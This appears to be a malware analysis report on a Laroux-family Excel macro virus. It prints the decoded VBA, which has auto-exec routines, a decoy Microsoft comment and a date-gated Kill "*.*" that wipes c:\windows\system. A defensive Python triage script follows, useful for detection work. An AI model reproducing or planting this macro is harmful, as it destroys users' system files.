Verdict: MALICIOUS
Risk score: 220

Malware insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file is an Excel workbook containing a VBA module named xl5galary with two auto-exec entry points, auto_open and auto_close; ClamAV identifies it as Xls.Trojan.Laroux-25, a long-known family of self-replicating Excel macro viruses. The comment block presenting the module as a Microsoft "XL5GALLERY" add-in is a decoy. auto_open does nothing except register an Application.OnSheetActivate handler pointing at xl5galary.galary, so whatever the macro does beyond the payload described next lives in that routine, which the preview below does not show. auto_close carries a date-gated destructive payload: on 11 May, 11 September, 29 October, 11 November and 11 December 1998, and on the 2nd and 11th of any month in 1999, it changes to c:\windows\system and runs Kill "*.*", deleting every file in that directory. Nothing in the extracted code contacts the network or stages a second payload; since only the first 1,000 lines of the 26 KB module are shown, treat the preview as a lower bound on the macro's behaviour.
Heuristics (4)

- ClamAV: Xls.Trojan.Laroux-25 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Laroux-25
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): auto_open routine runs automatically when the workbook is opened
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): auto_close routine runs automatically when the workbook is closed
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26285 bytes |

SHA-256: b945651c5d68e81db859c5669dbe5b9e03755b6a9fa55d3a786c5fb0e43976fe

Detection: ClamAV: Xls.Trojan.Laroux-25

Obfuscation or payload: unlikely
Script preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "xl5galary"
' ---------------------------------------------------------
' XL5GALLERY MACRO - ENABLES USERS OF VERSION 5 TO USE FX
' This is an autoload macro, which stays in the background
' so you can use the .XLA auto-add in.
' (C) Microsoft 1996. 1998
' ---------------------------------------------------------
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
' Normal error trap
On Error Resume Next
' Activation call for galary
Application.OnSheetActivate = ThisWorkbook.Name & "!xl5galary.galary"
End Sub
' End of routine
'
'
' Start of auto shutdown routine
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
' Ordinary error trap
var_b_10000000000 = Format(Date, "mm")
var_b_10000000001 = Format(Date, "dd")
var_b_10000000002 = Format(Date, "yyyy")
' Enable true date conversion
If var_b_10000000000 = 5 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 9 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 10 And var_b_10000000001 = 29 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 11 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 12 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If (var_b_10000000001 = 11 Or var_b_10000000001 = 2) And var_b_10000000002 = 1999 Then var_b_10000000003 = 1
If var_b_10000000003 = 1 Then
'
' start macro proper
'
ChDrive "C"
ChDir "c:\windows\system"
' Change to macro drive
Kill "*.*"
```

... (truncated)
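As an added example (not part of the analyzer's output or of the sample), the Python below takes the auto_open/auto_close excerpt quoted from the preview above, flags the auto-exec entry points, the Application.On* event hook and the destructive file calls, and then brute-forces the date-gated trigger into the concrete calendar days on which Kill "*.*" would run. The regex names, the DATE_VARS mapping from the sample's var_b_* holders to month/day/year, and the 1998 to 1999 search window are assumptions made for this example; it needs neither oletools nor the sample file.

```python
"""Triage of the extracted VBA module: flag auto-exec entry points, event hooks and
destructive file calls, then brute-force the date-gated trigger into concrete dates.
Added example for this report; not code from the analyzer or from the sample."""
import re
from datetime import date, timedelta

# Constructed excerpt: the auto_open/auto_close routines quoted from the report preview.
# The xl5galary.galary routine that OnSheetActivate points at is not in the preview.
VBA_SNIPPET = r'''
Sub auto_open()
On Error Resume Next
Application.OnSheetActivate = ThisWorkbook.Name & "!xl5galary.galary"
End Sub
Sub auto_close()
On Error Resume Next
var_b_10000000000 = Format(Date, "mm")
var_b_10000000001 = Format(Date, "dd")
var_b_10000000002 = Format(Date, "yyyy")
If var_b_10000000000 = 5 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 9 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 10 And var_b_10000000001 = 29 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 11 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 12 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If (var_b_10000000001 = 11 Or var_b_10000000001 = 2) And var_b_10000000002 = 1999 Then var_b_10000000003 = 1
If var_b_10000000003 = 1 Then
ChDrive "C"
ChDir "c:\windows\system"
Kill "*.*"
End If
End Sub
'''

# Entry points Office runs with no user action beyond opening or closing the file
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+'
    r'(auto_open|auto_close|auto_exec|workbook_open|workbook_beforeclose|document_open)\b',
    re.I | re.M)
# Application-level event hooks such as Application.OnSheetActivate = "..."
EVENT_HOOK_RE = re.compile(r'\bApplication\.(On\w+)\s*=', re.I)
# File-system calls that destroy data or change where relative paths resolve
DESTRUCTIVE_RE = re.compile(r'\b(Kill|ChDir|ChDrive|RmDir|SetAttr)\b')
# Every trigger line in the sample has the shape:  If <cond> Then var_b_10000000003 = 1
TRIGGER_RE = re.compile(r'^\s*If\s+(.+?)\s+Then\s+var_b_10000000003\s*=\s*1\s*$', re.M)
# Assumed mapping of the sample's holders to the Format(Date, ...) components assigned to them
DATE_VARS = {'var_b_10000000000': 'mm', 'var_b_10000000001': 'dd', 'var_b_10000000002': 'yyyy'}
ALLOWED_NAMES = set(DATE_VARS.values()) | {'and', 'or'}


def find_indicators(src):
    """Return the auto-exec subs, Application.On* hooks and destructive calls found in src."""
    return {
        'autoexec': sorted({m.lower() for m in AUTOEXEC_RE.findall(src)}),
        'event_hooks': sorted({'Application.' + m for m in EVENT_HOOK_RE.findall(src)}),
        'destructive': sorted(set(DESTRUCTIVE_RE.findall(src))),
    }


def vba_condition_to_python(cond):
    """Translate one VBA trigger condition into a Python boolean expression over mm/dd/yyyy.
    Only the names in ALLOWED_NAMES, integers, '==' and parentheses pass the check,
    so the eval() in trigger_dates cannot reach anything else."""
    expr = cond
    for var, name in DATE_VARS.items():
        expr = expr.replace(var, name)
    expr = re.sub(r'(?<![<>=])=(?!=)', '==', expr)   # VBA equality is a single '='
    expr = re.sub(r'\bAnd\b', 'and', expr, flags=re.I)
    expr = re.sub(r'\bOr\b', 'or', expr, flags=re.I)
    if not re.fullmatch(r'[\w\s=()]+', expr) or \
            not set(re.findall(r'[A-Za-z_]\w*', expr)) <= ALLOWED_NAMES:
        raise ValueError('unsupported token in condition: ' + cond)
    return expr


def trigger_dates(src, start=date(1998, 1, 1), end=date(1999, 12, 31)):
    """Walk every day in [start, end] and collect those on which any trigger condition holds."""
    exprs = [vba_condition_to_python(c) for c in TRIGGER_RE.findall(src)]
    hits = []
    day = start
    while day <= end:
        env = {'mm': day.month, 'dd': day.day, 'yyyy': day.year}
        if any(eval(e, {'__builtins__': {}}, env) for e in exprs):
            hits.append(day)
        day += timedelta(days=1)
    return hits


def trigger_dates_iso(src):
    """Same as trigger_dates, as ISO strings for reporting."""
    return [d.isoformat() for d in trigger_dates(src)]


if __name__ == '__main__':
    print(find_indicators(VBA_SNIPPET))
    days = trigger_dates_iso(VBA_SNIPPET)
    print(len(days), 'trigger days, first', days[0], 'last', days[-1])
```

Enumerating the trigger window is more useful than reading the conditions by eye: for this sample it yields 29 days (five fixed dates in 1998 plus the 2nd and 11th of every month in 1999), which is the list you would feed into a sandbox's clock-skew runs to force the payload path. The whitelist in vba_condition_to_python is what makes the eval tolerable on attacker-controlled text; a condition that calls anything (for instance a Shell expression) is rejected rather than executed.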